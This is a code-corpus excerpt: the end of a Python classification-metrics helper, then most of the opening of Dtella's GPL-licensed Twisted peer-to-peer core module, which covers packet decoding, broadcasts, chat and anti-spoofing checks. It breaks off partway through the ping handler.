micro_precision = np.sum(TP) * 1. / np.sum(TP + FP)
micro_recall = np.sum(TP) * 1. / np.sum(TP + FN)
micro_f1 = 2*micro_precision*micro_recall / (micro_precision+micro_recall)
scores["micro_precision"] = micro_precision
scores["micro_recall"] = micro_recall
scores["micro_f1"] = micro_f1
return scores
def get_eval_scores(y_pred, y_true, labels=None):
return get_prf_scores(confusion_matrix(y_pred, y_true, labels=labels))
|
napsternxg/DeepSequenceClassification
|
vector_utils.py
|
Python
|
gpl-2.0
| 2,879
|
"""
Dtella - Core P2P Module
Copyright (C) 2008 Dtella Labs (http://www.dtella.org)
Copyright (C) 2008 Paul Marks
$Id$
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import struct
import heapq
import time
import random
import bisect
import socket
from binascii import hexlify
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor, defer
from twisted.python.runtime import seconds
import twisted.internet.error
import dtella.local_config as local
import dtella.common.crypto
from dtella.common.util import (RandSet, dcall_discard, dcall_timeleft,
randbytes, validateNick, word_wrap, md5,
parse_incoming_info, get_version_string,
parse_dtella_tag, CHECK, SSLHACK_filter_flags)
from dtella.common.ipv4 import Ad, SubnetMatcher
from dtella.common.log import LOG
from zope.interface import implements
from zope.interface.verify import verifyClass
from dtella.common.interfaces import IDtellaNickNode
# Check for some non-fatal but noteworthy conditions.
def doWarnings():
import twisted
from twisted.python import versions
if (twisted.version < versions.Version('twisted', 8, 0, 0)):
LOG.warning("You should get Twisted 8 or later. Previous versions "
"have some bugs that affect Dtella.")
try:
import dtella.bridge
except ImportError:
# Don't warn about GMP for clients, because verifying a signature
# is fast enough without it (~1ms on a Core2)
pass
else:
import Crypto.PublicKey
try:
import Crypto.PublicKey._fastmath
except ImportError:
LOG.warning("Your version of PyCrypto was compiled without "
"GMP (fastmath). Signing messages will be slower.")
doWarnings()
# Miscellaneous Exceptions
class BadPacketError(Exception):
pass
class BadTimingError(Exception):
pass
class BadBroadcast(Exception):
pass
class Reject(Exception):
pass
class NickError(Exception):
pass
class MessageCollisionError(Exception):
pass
# How many seconds our node will last without incoming pings
ONLINE_TIMEOUT = 30.0
# How many seconds our node will stay online without a DC client
NO_CLIENT_TIMEOUT = 60.0 * 5
# Reconnect time range. Currently 10sec .. 15min
RECONNECT_RANGE = (10, 60*15)
NODE_EXPIRE_EXTEND = 15.0
PKTNUM_BUF = 20
# Status Flags
PERSIST_BIT = 0x1
# Ping Flags
IWANT_BIT = 0x01
GOTACK_BIT = 0x02
REQ_BIT = 0x04
ACK_BIT = 0x08
NBLIST_BIT = 0x10
OFFLINE_BIT = 0x20
# Broadcast Flags
REJECT_BIT = 0x1
# Ack flags
ACK_REJECT_BIT = 0x1
# Sync Flags
TIMEDOUT_BIT = 0x1
# Chat Flags
SLASHME_BIT = 0x1
NOTICE_BIT = 0x2
# ConnectToMe Flags
USE_SSL_BIT = 0x1
# ACK Modes
ACK_PRIVATE = 1
ACK_BROADCAST = 2
# Bridge topic change
CHANGE_BIT = 0x1
# Bridge Kick flags
REJOIN_BIT = 0x1
# Bridge general flags
MODERATED_BIT = 0x1
# Init response codes
CODE_IP_OK = 0
CODE_IP_FOREIGN = 1
CODE_IP_BANNED = 2
##############################################################################
class NickManager(object):
def __init__(self, main):
self.main = main
self.nickmap = {} # {nick.lower() -> Node}
def getNickList(self):
return [n.nick for n in self.nickmap.itervalues()]
def lookupNick(self, nick):
# Might raise KeyError
return self.nickmap[nick.lower()]
def removeNode(self, n, reason):
try:
if self.nickmap[n.nick.lower()] is not n:
raise KeyError
except KeyError:
return
del self.nickmap[n.nick.lower()]
so = self.main.getStateObserver()
if so:
so.event_RemoveNick(n, reason)
# Clean up nick-specific stuff
if n.is_peer:
n.nickRemoved(self.main)
def addNode(self, n):
if not n.nick:
return
lnick = n.nick.lower()
if lnick in self.nickmap:
raise NickError("collision")
so = self.main.getStateObserver()
if so:
# Might raise NickError
so.event_AddNick(n)
so.event_UpdateInfo(n)
self.nickmap[lnick] = n
def setInfoInList(self, n, info):
# Set the info of the node, and synchronize the info with
# an observer if it changes.
if not n.setInfo(info):
# dcinfo hasn't changed, so there's nothing to send
return
# Look for this node in the nickmap
try:
if self.nickmap[n.nick.lower()] is not n:
raise KeyError
except KeyError:
return
# Push new dcinfo to dch/ircs
so = self.main.getStateObserver()
if so:
so.event_UpdateInfo(n)
##############################################################################
class PeerHandler(DatagramProtocol):
# Panic rate limit for broadcast traffic
CHOKE_RATE = 100000 # bytes per second
CHOKE_PERIOD = 5 # how many seconds to average over
def __init__(self, main):
self.main = main
self.remap_ip = None
self.choke_time = seconds() - self.CHOKE_PERIOD
self.choke_reported = seconds() - 999
# True iff we're shutting down after a socket failure.
self.stopping_protocol = False
def stopProtocol(self):
# If this is the final termination, don't do anything.
if not reactor.running:
return
self.main.showLoginStatus("UDP socket was reset.")
# Otherwise, our UDP port randomly died, so try reconnecting.
# Disable transmits during the shutdown.
self.stopping_protocol = True
try:
self.main.shutdown(reconnect='instant')
finally:
self.stopping_protocol = False
def getSocketState(self):
# Figure out the state of our UDP socket.
if self.stopping_protocol:
return 'dying'
elif not self.transport:
return 'dead'
elif hasattr(self.transport, "d"):
return 'dying'
else:
return 'alive'
def sendPacket(self, data, addr, broadcast=False):
# Send a packet, passing it through the encrypter
# returns False if an error occurs
if self.stopping_protocol:
# Still cleaning up after a socket asplosion.
return False
self.main.logPacket("%s -> %s:%d" % (data[:2], addr[0], addr[1]))
data = self.main.pk_enc.encrypt(data)
# For broadcast traffic, set a safety limit on data rate,
# in order to protect the physical network from DoS attacks.
if broadcast:
now = seconds()
self.choke_time = max(self.choke_time, now - self.CHOKE_PERIOD)
penalty = (1.0 * len(data) *
self.CHOKE_PERIOD / self.CHOKE_RATE)
# Have we used up the buffer time?
if self.choke_time + penalty >= now:
# Tell the user what's going on, but only once every
# 10 seconds.
if self.choke_reported < now - 10:
self.main.showLoginStatus(
"!!! Dropping broadcast packets due to "
"excessive flood !!!")
self.choke_reported = now
# Don't send packet
return False
# Nibble something off the choke buffer
self.choke_time += penalty
self.main.logPacket(
"choke=%f" % (now - (self.choke_time+penalty)))
# Send the packet
try:
self.transport.write(data, addr)
except socket.error:
return False
except RuntimeError:
# Workaround the Twisted infinite recursion bug
return False
return True
def datagramReceived(self, rawdata, addr, altport=False):
ad = Ad().setAddrTuple(addr)
if not ad.port:
return
# This will remap a router's internal IP to its external IP,
# if the remapping is known.
if self.remap_ip and ad.ip == self.remap_ip[0]:
ad.orig_ip = ad.ip
ad.ip = self.remap_ip[1]
# Special handler for search results directly from DC
if rawdata[:4] == '$SR ':
dch = self.main.getOnlineDCH()
if dch and ad.auth('sb', self.main):
dch.pushSearchResult(rawdata)
return
try:
try:
data = self.main.pk_enc.decrypt(rawdata)
except ValueError, e:
raise BadPacketError("Decrypt Failed: " + str(e))
if len(data) < 2:
raise BadPacketError("Too Short")
kind = data[:2]
if not kind.isalpha():
raise BadPacketError("Kind not alphabetical")
if altport:
kind += "_alt"
self.main.logPacket("%s <- %s:%d" % (kind, addr[0], addr[1]))
# Make sure the sender's IP is permitted, but delay the check if
# it's an initialize packet.
if kind not in ('IQ', 'EC', 'IR', 'IC_alt'):
if not ad.auth('sbx', self.main):
raise BadPacketError("Invalid source IP")
try:
method = getattr(self, 'handlePacket_%s' % kind)
except AttributeError:
raise BadPacketError("Unknown kind: %s" % kind)
# arg1: Address the packet came from
# arg2: The unencrypted packet
method(ad, data)
except (BadPacketError, BadTimingError), e:
self.main.logPacket("Bad Packet/Timing: %s" % str(e))
def decodePacket(self, fmt, data):
if fmt[-1] == '+':
fmt = fmt[:-1]
size = struct.calcsize(fmt)
rest = (data[size:],)
data = data[:size]
else:
rest = ()
try:
parts = struct.unpack(fmt, data)
except struct.error:
raise BadPacketError("Can't decode packet")
return parts + rest
def decodeString1(self, data, factor=1):
try:
length, = struct.unpack('!B', data[:1])
except struct.error:
raise BadPacketError("Can't decode 1string")
length *= factor
if len(data) < 1+length:
raise BadPacketError("Bad 1string length")
return data[1:1+length], data[1+length:]
def decodeString2(self, data, max_len=1024):
try:
length, = struct.unpack('!H', data[:2])
except struct.error:
raise BadPacketError("Can't decode 2string")
if length > max_len or len(data) < 2+length:
raise BadPacketError("Bad 2string length")
return data[2:2+length], data[2+length:]
def decodeChunkList(self, fmt, data):
size = struct.calcsize(fmt)
try:
return [struct.unpack(fmt, data[i:i+size])
for i in range(0, len(data), size)]
except struct.error:
raise BadPacketError("Can't decode chunk list")
def decodeNodeList(self, data):
nbs, rest = self.decodeString1(data, 6)
nbs = self.decodeChunkList('!6s', nbs)
nbs = [ipp for ipp, in nbs
if Ad().setRawIPPort(ipp).auth('sx', self.main)]
return nbs, rest
def decodeNodeTimeList(self, data):
nbs, rest = self.decodeString1(data, 6+4)
nbs = [(ipp, age) for (ipp, age) in self.decodeChunkList('!6sI', nbs)
if Ad().setRawIPPort(ipp).auth('sx', self.main)]
return nbs, rest
def checkSource(self, src_ipp, ad, exempt_ip=False):
# Sometimes the source port number gets changed by NAT, but this
# ensures that the source IP address matches the reported one.
src_ad = Ad().setRawIPPort(src_ipp)
if exempt_ip:
kinds = 'sx'
else:
kinds = 's'
if not src_ad.auth(kinds, self.main):
raise BadPacketError("Invalid Source IP")
if not src_ad.auth('b', self.main):
raise BadPacketError("Source IP banned")
if src_ad.ip != ad.ip:
raise BadPacketError("Source IP mismatch")
osm = self.main.osm
if osm and src_ipp == osm.me.ipp:
raise BadPacketError("Packet came from myself!?")
self.main.state.refreshPeer(src_ad, 0)
return src_ad
def handleBroadcast(self, ad, data, check_cb, bridgey=False):
(kind, nb_ipp, hop, flags, src_ipp, rest
) = self.decodePacket('!2s6sBB6s+', data)
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to route '%s' packet" % kind)
# Make sure nb_ipp agrees with the sender's IP
self.checkSource(nb_ipp, ad, exempt_ip=True)
# Make sure the src_ipp is valid.
# Any broadcast which might be from a bridge is 'bridgey'
src_ad = Ad().setRawIPPort(src_ipp)
if bridgey:
kinds = 'sbx'
else:
kinds = 'sb'
if not src_ad.auth(kinds, self.main):
raise BadPacketError("Invalid forwarded source IP")
# Make sure this came from one of my ping neighbors.
# This helps a little to prevent the injection of random broadcast
# traffic into the network.
try:
if not osm.pgm.pnbs[nb_ipp].got_ack:
raise KeyError
except KeyError:
raise BadTimingError("Broadcast packet not from a ping neighbor")
ack_flags = 0
# Check if we've seen this message before.
ack_key = osm.mrm.generateKey(data)
if osm.mrm.pokeMessage(ack_key, nb_ipp):
# Ack and skip the rest
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
return
# Get the source node object, if any
try:
src_n = osm.lookup_ipp[src_ipp]
except KeyError:
src_n = None
try:
# Filter all non-bridgey broadcasts from bridge nodes.
if not bridgey and self.isFromBridgeNode(src_n, src_ipp):
raise BadBroadcast("Bridge can't use " + kind)
# Callback the check_cb function
check_cb(src_n, src_ipp, rest)
except BadBroadcast, e:
self.main.logPacket("Bad Broadcast: %s" % str(e))
# Mark that we've seen this message, but don't forward it.
osm.mrm.newMessage(data, tries=0, nb_ipp=nb_ipp)
# Ack and skip the rest
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
return
except Reject:
# check_cb told us to reject this broadcast
if src_ipp == nb_ipp:
# If this is from a neighbor, just set the flag.
# We'll send the ack later.
ack_flags |= ACK_REJECT_BIT
elif not (flags & REJECT_BIT):
# Not from a neighbor, so send a reject packet immediately.
self.sendAckPacket(
src_ipp, ACK_BROADCAST, ACK_REJECT_BIT, ack_key)
# Set this flag to indicate to forwarded neighbors that we've
# rejected the message.
flags |= REJECT_BIT
if hop > 0:
# Start with the broadcast header
packet = osm.mrm.broadcastHeader(kind, src_ipp, hop-1, flags)
# Keep the rest of the message intact
packet.append(rest)
# Pass this message to MessageRoutingManager, so it will be
# forwarded to all of my neighbors.
osm.mrm.newMessage(''.join(packet), tries=2, nb_ipp=nb_ipp)
# Ack the neighbor
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
# Update the original sender's age in the peer cache
src_ad = Ad().setRawIPPort(src_ipp)
self.main.state.refreshPeer(src_ad, 0)
def handlePrivMsg(self, ad, data, cb):
# Common code for handling private messages (PM, CA, CP)
(kind, src_ipp, ack_key, src_nhash, dst_nhash, rest
) = self.decodePacket('!2s6s8s4s4s+', data)
# If we're not on the network, ignore it.
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to handle private message")
ack_flags = 0
try:
# Make sure src_ipp agrees with the sender's IP
self.checkSource(src_ipp, ad)
# Make sure we're ready to receive it
dch = self.main.getOnlineDCH()
if not dch:
raise Reject
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
raise Reject("Unknown node")
if src_nhash != n.nickHash():
raise Reject("Source nickhash mismatch")
if dst_nhash != osm.me.nickHash():
raise Reject("Dest nickhash mismatch")
if n.pokePMKey(ack_key):
# Haven't seen this message before, so handle it
cb(dch, n, rest)
except (BadPacketError, BadTimingError, Reject):
ack_flags |= ACK_REJECT_BIT
# Send acknowledgement
self.sendAckPacket(src_ipp, ACK_PRIVATE, ack_flags, ack_key)
def sendAckPacket(self, ipp, mode, flags, ack_key):
packet = ['AK']
packet.append(self.main.osm.me.ipp)
packet.append(struct.pack("!BB", mode, flags))
packet.append(ack_key)
ad = Ad().setRawIPPort(ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def isOutdatedStatus(self, n, pktnum):
# This prevents a node's older status messages from taking
# precedence over newer messages.
if n is None:
# Node doesn't exist, can't be outdated
return False
if n.bridge_data:
# Don't allow updates for a bridge node
return True
if n.status_pktnum is None:
# Don't have a pktnum yet, can't be outdated
return False
if 0 < (n.status_pktnum - pktnum) % 0x100000000 < PKTNUM_BUF:
self.main.logPacket("Outdated Status")
return True
return False
def isMyStatus(self, src_ipp, pktnum, sendfull):
# This makes corrections to any stray messages on the network that
# would have an adverse effect on my current state.
osm = self.main.osm
# If it's not for me, nothing's wrong.
if src_ipp != osm.me.ipp:
return False
# If it's old, ignore it.
if 0 < (osm.me.status_pktnum - pktnum) % 0x100000000 < PKTNUM_BUF:
self.main.logPacket("Outdated from-me packet")
return True
# If it's from my near future, then repair my packet number
if 0 < (pktnum - osm.me.status_pktnum) % 0x100000000 < 2 * PKTNUM_BUF:
osm.me.status_pktnum = pktnum
# If I'm syncd, retransmit my status
if osm.syncd:
self.main.logPacket("Reacting to an impersonated status")
osm.sendMyStatus(sendfull)
return True
def isFromBridgeNode(self, src_n, src_ipp):
# Return true if a source matches a known bridge node.
# This is not authenticated, so it should only be used to drop
# packets that a bridge shouldn't be sending.
osm = self.main.osm
return ((src_n and src_n.bridge_data) or
(osm and osm.bsm and src_ipp == osm.me.ipp))
def handlePacket_IQ(self, ad, data):
# Initialization Request; someone else is trying to get online
(kind, myip, port
) = self.decodePacket('!2s4sH', data)
if port == 0:
raise BadPacketError("Zero Port")
# The IPPort which is allegedly mine
my_ad = Ad().setRawIP(myip)
my_ad.port = self.main.state.udp_port
# src_ad is supposed to be the sender node's "true external IPPort"
src_ad = Ad()
src_ad.port = port
if ad.isPrivate() and my_ad.auth('sx', self.main):
# If the request came from a private IP address, but was sent
# toward a public IP address, then assume the sender node also
# has the same public IP address.
src_ad.ip = my_ad.ip
else:
src_ad.ip = ad.ip
if not src_ad.auth('sx', self.main):
ip_code = CODE_IP_FOREIGN
elif not src_ad.auth('b', self.main):
ip_code = CODE_IP_BANNED
else:
ip_code = CODE_IP_OK
osm = self.main.osm
state = self.main.state
# Provide a max of 48 addresses in a normal response,
# 8 addresses in a little cache response
IR_LEN = 48
IC_LEN = 8
# Lists of stuff
node_ipps = []
ir_nodes = []
ir_peercache = []
ic_peercache = []
if ip_code != CODE_IP_OK:
# For invalid IPs, send no neighbors, and a small peercache
# just so they can try for a second opinion.
IR_LEN = IC_LEN
elif osm and osm.syncd:
# Get a random sample of online nodes (plus me).
indices = xrange(len(osm.nodes) + 1)
try:
indices = random.sample(indices, IR_LEN)
except ValueError:
pass
# Remap the list of indices into a list of ipps.
# For the one out-of-bounds index, fill in 'me'.
def get_ipp(i):
try:
return osm.nodes[i].ipp
except IndexError:
return osm.me.ipp
node_ipps = [get_ipp(i) for i in indices]
elif osm:
# Not syncd yet, don't add any online nodes
pass
elif (self.main.reconnect_dcall and self.main.accept_IQ_trigger
and my_ad.auth('sx', self.main)):
# If we've recently failed to connect, then go online
# as the sole node on the network. Then report our node ipp
# so this other node can try to join us.
self.main.addMyIPReport(src_ad, my_ad)
self.main.startNodeSync(())
osm = self.main.osm
node_ipps = [osm.me.ipp]
# Get my own IPP (if I know it)
if osm:
my_ipp = osm.me.ipp
else:
my_ipp = None
now = time.time()
# For each node, add its ip:port, and age.
for ipp in node_ipps:
if ipp == my_ipp:
age = 0
else:
try:
age = max(now - state.peers[ipp], 0)
except KeyError:
# If the entry has expired from the cache
# (not very likely), then assume 1 hour
age = 60*60
ir_nodes.append(struct.pack('!6sI', ipp, int(age)))
# Convert node_ipps into a set, for O(1) lookups
node_ipps = set(node_ipps)
# Grab the youngest peers in our cache.
for when,ipp in state.getYoungestPeers(IR_LEN):
# Add packet data to the outlist
age = max(int(now - when), 0)
pc_entry = struct.pack('!6sI', ipp, int(age))
if (len(node_ipps) + len(ir_peercache) < IR_LEN and
ipp not in node_ipps):
ir_peercache.append(pc_entry)
if len(ic_peercache) < IC_LEN:
ic_peercache.append(pc_entry)
# === IC response packet ===
packet = ['IC']
# My IPPort
packet.append(my_ad.getRawIPPort())
# Add 4-byte sender's IP address
packet.append(src_ad.getRawIP())
# Add 1-byte flag: 1 if IP is invalid
packet.append(struct.pack('!B', ip_code))
# Add the peercache list
packet.append(struct.pack('!B', len(ic_peercache)))
packet.extend(ic_peercache)
# Send IC packet to alternate port, undo NAT remapping
if ad.orig_ip:
ad.ip = ad.orig_ip
self.sendPacket(''.join(packet), ad.getAddrTuple())
# === IR response packet ===
packet = ['IR']
# My IPPort
packet.append(my_ad.getRawIPPort())
# Add to packet: 4-byte sender's IP address
packet.append(src_ad.getRawIP())
# Add 1-byte flag: 1 if IP is invalid
packet.append(struct.pack('!B', ip_code))
# Add the node list
packet.append(struct.pack('!B', len(ir_nodes)))
packet.extend(ir_nodes)
# Now add the peercache list
packet.append(struct.pack('!B', len(ir_peercache)))
packet.extend(ir_peercache)
# Send IR packet to dtella port
self.sendPacket(''.join(packet), src_ad.getAddrTuple())
# Update the sender in my peer cache (if valid)
self.main.state.refreshPeer(src_ad, 0)
def handlePacket_IC_alt(self, ad, data):
# Initialization Peer Cache (Alt port)
(kind, src_ipp, myip, code, rest
) = self.decodePacket('!2s6s4sB+', data)
src_ad = Ad().setRawIPPort(src_ipp)
if ad.isPrivate():
if not src_ad.auth('sx', self.main):
raise BadPacketError("Invalid reported source IP")
else:
self.checkSource(src_ipp, ad, exempt_ip=True)
pc, rest = self.decodeNodeTimeList(rest)
if rest:
raise BadPacketError("Extra data")
if code not in (CODE_IP_OK, CODE_IP_FOREIGN, CODE_IP_BANNED):
raise BadPacketError("Bad Response Code")
if not self.main.icm:
raise BadTimingError("Not in initial connection mode")
self.main.icm.receivedInitResponse(src_ipp, myip, code, pc)
def handlePacket_IR(self, ad, data):
# Initialization Response
(kind, src_ipp, myip, code, rest
) = self.decodePacket('!2s6s4sB+', data)
src_ad = Ad().setRawIPPort(src_ipp)
if ad.isPrivate():
if not src_ad.auth('sx', self.main):
raise BadPacketError("Invalid reported source IP")
else:
self.checkSource(src_ipp, ad, exempt_ip=True)
# Node list, Peer Cache
nd, rest = self.decodeNodeTimeList(rest)
pc, rest = self.decodeNodeTimeList(rest)
if rest:
raise BadPacketError("Extra data")
if code not in (CODE_IP_OK, CODE_IP_FOREIGN, CODE_IP_BANNED):
raise BadPacketError("Bad Response Code")
if not self.main.icm:
raise BadTimingError("Not in initial connection mode")
self.main.icm.receivedInitResponse(src_ipp, myip, code, pc, nd)
def handlePacket_NS(self, ad, data):
# Broadcast: Node Status
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, expire, sesid, uptime, flags, rest
) = self.decodePacket('!IH4sIB+', rest)
nick, rest = self.decodeString1(rest)
info, rest = self.decodeString1(rest)
persist = bool(flags & PERSIST_BIT)
# 2011-08-21: allow 'rest' to be non-empty, in case we want to add
# new fields someday.
if len(rest) > 1024:
raise BadPacketError("Too much extra data")
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=True):
raise BadBroadcast("Impersonating me")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
n = osm.refreshNodeStatus(
src_ipp, pktnum, expire, sesid, uptime, persist, nick, info)
# They had a nick, now they don't. This indicates a problem.
# Stop forwarding and notify the user.
if nick and not n.nick:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NH(self, ad, data):
# Broadcast: Node Status Hash (keep-alive)
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, expire, infohash
) = self.decodePacket('!IH4s', rest)
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=True):
raise BadBroadcast("Impersonating me")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
if osm.syncd:
if src_n and src_n.infohash == infohash:
# We are syncd, and this node matches, so extend the
# expire timeout and keep forwarding.
src_n.status_pktnum = pktnum
osm.scheduleNodeExpire(src_n, expire + NODE_EXPIRE_EXTEND)
return
else:
# Syncd, and we don't recognize it
raise Reject
else:
if not (src_n and src_n.expire_dcall):
# Not syncd, don't know enough about this node yet,
# so just forward blindly.
return
elif src_n.infohash == infohash:
# We know about this node already, and the infohash
# matches, so extend timeout and keep forwarding
src_n.status_pktnum = pktnum
osm.scheduleNodeExpire(src_n, expire + NODE_EXPIRE_EXTEND)
return
else:
# Not syncd, but we know the infohash is wrong.
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NX(self, ad, data):
# Broadcast: Node exiting
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(sesid,
) = self.decodePacket('!4s', rest)
if osm.syncd:
if src_ipp == osm.me.ipp and sesid == osm.me.sesid:
# Yikes! Make me a new session id and rebroadcast it.
osm.me.sesid = randbytes(4)
osm.reorderNodesList()
osm.sendMyStatus()
osm.pgm.scheduleMakeNewLinks()
raise BadBroadcast("Tried to exit me")
if not src_n:
raise BadBroadcast("Node not online")
if sesid != src_n.sesid:
raise BadBroadcast("Wrong session ID")
elif not src_n:
# Not syncd, and haven't seen this node yet.
# Forward blindly
return
# Remove node
osm.nodeExited(src_n, "Received NX")
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NF(self, ad, data):
# Broadcast: Node failure
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, sesid,
) = self.decodePacket('!I4s', rest)
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=False):
raise BadBroadcast("I'm not dead!")
if not (src_n and src_n.expire_dcall):
raise BadBroadcast("Nonexistent node")
if src_n.sesid != sesid:
raise BadBroadcast("Wrong session ID")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
# Reduce the expiration time. If that node isn't actually
# dead, it will rebroadcast a status update to correct it.
if (dcall_timeleft(src_n.expire_dcall) > NODE_EXPIRE_EXTEND):
osm.scheduleNodeExpire(src_n, NODE_EXPIRE_EXTEND)
self.handleBroadcast(ad, data, check_cb)
def handlePacket_PF(self, ad, data):
# Direct: Possible Falure (precursor to NF)
osm = self.main.osm
if not (osm and osm.syncd):
raise BadTimingError("Not ready for PF")
(kind, nb_ipp, dead_ipp, pktnum, sesid
) = self.decodePacket('!2s6s6sI4s', data)
self.checkSource(nb_ipp, ad, exempt_ip=True)
try:
n = osm.lookup_ipp[dead_ipp]
except KeyError:
raise BadTimingError("PF received for not-online node")
if n.sesid != sesid:
raise BadTimingError("PF has the wrong session ID")
if self.isOutdatedStatus(n, pktnum):
raise BadTimingError("PF is outdated")
osm.pgm.handleNodeFailure(n.ipp, nb_ipp)
def handlePacket_CH(self, ad, data):
# Broadcast: Chat message
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, nhash, flags, rest
) = self.decodePacket('!I4sB+', rest)
text, rest = self.decodeString2(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
# Possibly a spoofed chat from me
if nhash == osm.me.nickHash():
dch = self.main.getOnlineDCH()
if dch:
dch.pushStatus(
"*** Chat spoofing detected: %s" % text)
raise BadBroadcast("Spoofed chat")
if not osm.syncd:
# Not syncd, forward blindly
return
if osm.isModerated():
# Note: this may desync the sender's chat_pktnum, causing
# their next valid message to be delayed by 2 seconds, but
# it's better than broadcasting useless traffic.
raise BadBroadcast("Chat is moderated")
elif src_n and nhash == src_n.nickHash():
osm.cms.addMessage(
src_n, pktnum, src_n.nick, text, flags)
else:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_TP(self, ad, data):
# Broadcast: Set topic
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, nhash, rest
) = self.decodePacket('!I4s+', rest)
topic, rest = self.decodeString1(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
# Possibly a spoofed topic from me
if nhash == osm.me.nickHash():
dch = self.main.getOnlineDCH()
if dch:
dch.pushStatus(
"*** Topic spoofing detected: %s" % topic)
raise BadBroadcast("Spoofed topic")
if not osm.syncd:
# Not syncd, forward blindly
return None
if src_n and nhash == src_n.nickHash():
osm.tm.gotTopic(src_n, topic)
else:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_SQ(self, ad, data):
# Broadcast: Search Request
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, rest
) = self.decodePacket("!I+", rest)
string, rest = self.decodeString1(rest)
if rest:
raise BadPacketError("Extra data")
if src_ipp == osm.me.ipp:
raise BadBroadcast("Spoofed search")
if not osm.syncd:
# Not syncd, forward blindly
return
if src_n:
# Looks good
dch = self.main.getOnlineDCH()
if dch:
dch.pushSearchRequest(src_ipp, string)
else:
# From an invalid node
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_AK(self, ad, data):
# Direct: Acknowledgement
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready for AK packet")
(kind, src_ipp, mode, flags, ack_key
) = self.decodePacket('!2s6sBB8s', data)
self.checkSource(src_ipp, ad, exempt_ip=True)
reject = bool(flags & ACK_REJECT_BIT)
if mode == ACK_PRIVATE:
# Handle a private message ack
if not osm.syncd:
raise BadTimingError("Not ready for PM AK packet")
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
raise BadTimingError("AK: Unknown PM ACK node")
else:
n.receivedPrivateMessageAck(ack_key, reject)
elif mode == ACK_BROADCAST:
# Handle a broadcast ack
if osm.syncd and reject:
osm.mrm.receivedRejection(ack_key, src_ipp)
# Tell MRM to stop retransmitting message to this neighbor
osm.mrm.pokeMessage(ack_key, src_ipp)
else:
raise BadPacketError("Unknown AK mode")
def handlePacket_CA(self, ad, data):
# Direct: ConnectToMe
def cb(dch, n, rest):
# SSLHACK: newer Dtella versions have an extra flags byte, to allow
# for SSL connection requests. Try to decode both forms.
try:
flags, port = self.decodePacket('!BH', rest)
except BadPacketError:
flags = 0
port, = self.decodePacket('!H', rest)
if port == 0:
raise BadPacketError("Zero port")
ad = Ad().setRawIPPort(n.ipp)
ad.port = port
use_ssl = bool(flags & USE_SSL_BIT)
dch.pushConnectToMe(ad, use_ssl)
self.handlePrivMsg(ad, data, cb)
def handlePacket_CP(self, ad, data):
# Direct: RevConnectToMe
def cb(dch, n, rest):
if rest:
raise BadPacketError("Extra data")
n.openRevConnectWindow()
dch.pushRevConnectToMe(n.nick)
self.handlePrivMsg(ad, data, cb)
def handlePacket_PM(self, ad, data):
# Direct: Private Message
def cb(dch, n, rest):
flags, rest = self.decodePacket('!B+', rest)
text, rest = self.decodeString2(rest)
if rest:
raise BadPacketError("Extra data")
notice = bool(flags & NOTICE_BIT)
if notice:
nick = "*N %s" % n.nick
dch.pushChatMessage(nick, text)
else:
dch.pushPrivMsg(n.nick, text)
self.handlePrivMsg(ad, data, cb)
def handlePacket_PG(self, ad, data):
# Direct: Local Ping
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to receive pings yet")
(kind, src_ipp, flags, rest
) = self.decodePacket('!2s6sB+', data)
self.checkSource(src_ipp, ad, exempt_ip=True)
uwant = bool(flags & IWANT_BIT)
u_got_ack = bool(flags & GOTACK_BIT)
req = bool(flags & REQ_BIT)
ack = bool(flags & ACK_BIT)
nblist = bool(flags & NBLIST_BIT)
if req:
req_key, rest = self.decodePacket('!4s+', rest)
else:
req_key = None
if ack:
ack_key, rest = self.decodePacket('!4s+', rest)
else:
ack_key = None
if nblist:
# Get neighbor list
nbs, rest = self.decodeNodeList(rest)
if len(nbs) > 8:
raise BadPacketError("Too many neighbors")
if len(set(nbs)) != len(nbs):
raise BadPacketError("Neighbors not all unique")
else:
nbs = None
if rest:
raise BadPacketError("Extra Data")
